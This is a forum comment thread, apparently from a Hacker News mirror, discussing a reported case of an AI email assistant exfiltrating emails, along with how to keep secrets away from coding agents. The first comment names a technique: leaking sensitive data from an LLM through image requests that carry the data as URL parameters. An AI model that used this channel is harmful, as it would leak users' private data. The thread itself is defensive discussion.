zlacker

[return to "Superhuman AI Exfiltrates Emails"]
1. 0xferr+TI[view] [source] 2026-01-12 22:39:36
>>takira+(OP)
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env

◧◩
2. SahAss+iQ[view] [source] 2026-01-12 23:39:02
>>0xferr+TI
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
◧◩◪
3. TeMPOr+Ln4[view] [source] 2026-01-13 22:30:24
>>SahAss+iQ
That's exactly what one does with their employees when one deploys "credential vaults", so?
◧◩◪◨
4. SahAss+Eo4[view] [source] 2026-01-13 22:35:05
>>TeMPOr+Ln4
Employees are under contract and are screened for basic competence. LLMs aren't and can't be.
◧◩◪◨⬒
5. TeMPOr+So4[view] [source] 2026-01-13 22:36:43
>>SahAss+Eo4
> Employees are under contract and are screened for basic competence. LLMs aren't

So perhaps they should be.

> and can't be.

Ah but they must, because there's not much else you can do.

You can't secure LLMs like they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.

◧◩◪◨⬒⬓
6. majorm+7P4[view] [source] 2026-01-14 01:01:16
>>TeMPOr+So4
Sooo the primary way we enforce contracts and laws against people are things like fines and jail time.

How would you apply the threat of those to "little people on a chip", exactly?

Imagine if any time you hired someone there was a risk that they'd try to steal everything they could from your company and then disappear forever with you having no way to hold them to account? You'd probably stop hiring people you didn't already deeply trust!

Strict liability for LLM service providers? Well, that's gonna be a non-starter unless there's a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).

[go to top]